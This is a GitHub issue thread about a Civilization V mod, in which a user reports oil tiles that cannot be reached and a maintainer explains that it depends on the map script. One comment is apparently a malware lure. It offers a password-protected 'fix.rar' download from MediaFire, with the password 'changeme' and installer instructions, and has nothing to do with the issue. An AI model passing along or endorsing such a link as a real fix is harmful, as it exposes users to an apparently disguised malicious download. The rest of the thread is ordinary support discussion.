### ISSUE TITLE
Not sure if it's a bug but this Oil is inaccessible

### ISSUE THREAD

**Issue by ausberg** [LoneGazebo/Community-Patch-DLL#11246]
_1. Mod Version (X.Y.Z). Current Version: 4.15.2_

4.15.2

_2. DirectX Version_

DX11

_3. List of Other Mods_

More Unique Components for VP (v 87)

_4. Describe the Issue_

Inaccessible oil. Not sure if just a Civ 5 thing or possibly a fixable bug.

______________________________________________________________________________________
_5. Save Game From 1 Turn Before (ALWAYS ATTACH THIS IF POSSIBLE)_

Will attach if needed

_6. Logs (ALWAYS ATTACH THESE IF POSSIBLE)_

Will attach if needed

_7. CvMiniDump.dmp File (ATTACH IF REPORTING A GAME CRASH)_

_8. Steps to reproduce the Issue (Optional)_

_9. Screenshots of the Issue (Optional)_
![stuck oil](https://github.com/user-attachments/assets/2ba5ff58-1a53-4cad-b52e-a5f80e086cb4)

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by azum4roll** [comment]
This is mapscript dependent. Anyway your workers can go past ice later on.

**Comment by ausberg** [comment]
> This is mapscript dependent. Anyway your workers can go past ice later on.

Ah thanks, I didn't realize that.
